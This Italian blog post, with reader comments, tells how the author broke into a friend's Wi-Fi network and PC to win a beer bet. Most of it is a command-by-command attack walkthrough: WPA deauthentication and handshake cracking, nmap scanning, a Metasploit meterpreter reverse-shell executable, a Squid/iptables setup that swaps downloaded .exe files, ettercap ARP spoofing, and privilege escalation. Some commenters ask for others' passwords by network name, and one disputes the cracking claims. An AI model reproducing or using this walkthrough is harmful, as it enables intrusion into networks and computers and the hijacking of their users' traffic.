ecco come vincere una birra (=
durante un dibattito lui diceva che la sua password del wifi ( quella di default del router vodafone ) era inviolabile, e che anche uno si fosse connesso non avrebbe potuto creargli problemi perchè aveva windows SP 3 , quindi abbiamo fatto una scommessa che non era cosi, lui mi ha detto che potevo provare ad entrargli , e se ci fossi riuscito mi offriva una lime corona
ok iniziamo:
allora prima di tutto
TOOL REQUIREMENT:
- NMap ( Included on bt4 or bb )
- Ettercap ( Included on bt4 or bb )
- CoWPAtty ( coded by god )
- Rainbow tables ( in questo caso della vodafone e quindi http://www.megaupload.com/?d=IGN8BQN3 )
- Squid3 ( reposity debian-based )
- Metasploit
- Apache2
ok iniziamo:
per prima cosa ho attivato il monitor di aircrack
airmon-ng start wlan0
e poi ho scansionato fino a trovare il suo bssid , essid , channel, e un client ( il suo telefono nokia ) connesso tramite:
airodump-ng mon0ok poi specifichiamo il range di airodump tramite:
airodump-ng --channel CHANNEL --bssid BSSID --write file mon0e ho deauthenticato il suo cellulare dalla rete
aireplay-ng --deauth 1 -a BSSID -c CLIENT_DA_DEAUTHENTICARE_MAC mon0ok ottenuto l'handshake WPA, diamo il file cap in pasto a coWPAtty (=
cowpatty -s ESSID -r file.cap -d vodafoneaspetto un pò di minuti , e tatata ecco la sua password! =)
bon connetttiamoci alla sua rete:
wpa_passphrase ESSID PASSWORD > amico.conf
wpa_supplicant -Dwext -iwlan0 -c /root/amico.conf
dhclient wlan0ok sono connesso YO ,
ok iniziamo con il trovare tutti gli host connessi ^^
nmap -sP -T4 -n 192.168.1.1-255
trovo 4 target
192.168.1.1 # Router192.168.1.2 # (= io192.168.1.3 # Suo fisso192.168.1.4 # Suo nokia
ok allora per prima cosa, provo un metasploit autopwn =) che non darà nessun esito
/etc/init.d/postgresql startaprite da root il terminale psql e creo l'utente:
ALTER USER saeko WITH PASSWORD 'banana';ok aprite msfconsole
\q
db_driver postgresql
db_connect saeko:"banana"@localhost/msf
db_nmap -sS -T4 -O 192.168.1.3
db_autopwn -x -e -R great
ma nulla....
allora proviamo una strategia stranaaa! (=
avviamo apache2, in /var/www
creiamo un file .htaccess con questo:
Options +FollowSymlinksa cosa serve? semplice per reindirizzare tutte le pagine sul nostro eseguibile exploit.exe che ora creeremo ^^ ok apriamo
RewriteEngine on
RewriteRule ^(.*) exploit.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 X > /var/www/exploit.exeora avviamo apache2:
/etc/init.d/apache2 start
ora ho modificato squid3 in maniera da permettere il suo funzionamento pure sulle reti locali, basta cercare localnet e decomentare la propria sottorete, e poi attivare tramite decomentazione di http_access allow localnet , e poi cerchiamo 3128, e aggiungiamo transparent (= e infondo mettiamo:
url_rewrite_program /percorso/prossimoscript.pl
il prossimo script formato cosi:
use IO::Handle; use File::Basename; $myip = "192.168.1.2"; while (<>) { chomp $_; if ($_ =~ /(.*\.exe)/i) { $file = basename( $1 ); $new_url = "http://$myip/$file"; print "$new_url\n"; } else { print "$_\n"; } }
avviamolo
/etc/init.d/squid3 restart
ora settiamo iptables sul nostro pc
iptables -t nat -a PREROUTING --in-interface wlan0 -p tcp --destination-port 80 --jump REDIRECT --to-port 3128echo 1 > /proc/sys/net/ipv4/ip_forwardok ora ho iniziato un attacco di tipo arp spoofing ( spiegato nel precedente articolo )
con:
ettercap -T -M arp -i wlan0 // /192.168.1.2/ho avviato multi/handler da msfconsole
use exploit/multi/handlerset LHOST 0.0.0.0exploit -jpoi con una scusa gli ho fatto scaricare firefox 4, dello stile, comunque veramente una meraviglia sto firefox 4, lui : davvero va cosi bene? aspetta che lo provo! cosi è caduto nella mia trappola, ha scaricato un exe, che non era l'installer di firefox 4 ma il nostro exploit.exe
e di poi lifeissimple, aperta la sessione meterpreter, spari un getsystem e hai vinto...
Saeko
Certo che tutto sto lavoro per una birra.... :)
RispondiEliminapiù che una birra dovevi prendere un nobel, e trovare un mega posto di lavoro.!!!
RispondiEliminaUna domandina...in Cowpatty al posto dell'ESSID posso inserire il valore Vodafone-11181909 (la mia linea)? Perché mi da errore...dice che non ha trovato l'ESSID nella hash che ho scaricato dalla rainbow table vodafone!
RispondiEliminaGrazie,
Laura
Ciao a tutti. Ho preso l'handshake con airodump ma quando lancio cowpatty, utilizzando le rainbow presenti all'url di megaupload, mi da errore. Ho provato quindi ad aprire il file delle rainbow con un editor ma non sembra essere un file di testo. Ma è compresso?
RispondiEliminail link delle raimbow table non funziona più :( megaupload è stato chiuso, lo riesci a mettere su un altro host? o dire dove si trovano?
RispondiEliminaCiao, volevo farti i complimenti per il tuo lavoro, con i computer ci sai fare dato il materiale che hai utilizzato..purtroppo io non ho granchè tempo nè probabilmente la capacità di farlo...Potrsti farmi un enorme favore??
RispondiEliminaTrovarmi la wpa di questo vodafone..
Vodafone-10469580
Grazie mille in anticipo!! Aspetto notizie :)
0.o?!
EliminaNon funziona così!!
Devi prima collegarti alla rete di cui vuoi scovare la pass per poi poterne provare milioni, prima di trovare quella corretta. Se bastasse l'ssid per trovare la password sarebbe un sistema di sicurezza a dir poco ridicolo...
Mah, mi vengono dei dubbi. Le rainbow table funzionano solo per l'ssid usato per costruirle. Quindi se trovo un ssid comune (ad esempio dlink) mi procuro le rainbow table costruite per quel ssid e funzionano, ma non esiste che funzionino per un ssid casual come quello delle reti vodafone: il ssid è costruito aggiungendo otto numeri casuali alla parola vodafone. Forse è meglio che spieghi come avresti fatto a far funzionare le rainbow table con un ssid casuale.
RispondiEliminabravo nonomai provato bizonia un po alinarsi ,io scoperto unpaio con wifislax(solo infostrada) poi con beini un wep poi su alicewpa.it. pero su back track o cercato molto ma niente
RispondiEliminaditimi una coza come sipo eliminare il mac dal pc?
RispondiEliminaSSID:Vodafone-30538019
RispondiEliminaMAC:90:35:6e:40:78:b8
Qualcuno riesce a trovarmi la pass??
Come fai a fare un Bruteforce in qualche minuto anche se utilizi cowpatty (ti consiglio pyrit 6volte piu veloce il computing della gpu) cmq, per trovare una pass di tipo wpa/wpa almeno almeno 24 ore se siamo fortunati fino a una settimana se siamo sfigati pero, poi pass di 24 carattere, mission impossibile, conclusione sei un lammer di merda Auguri
RispondiElimina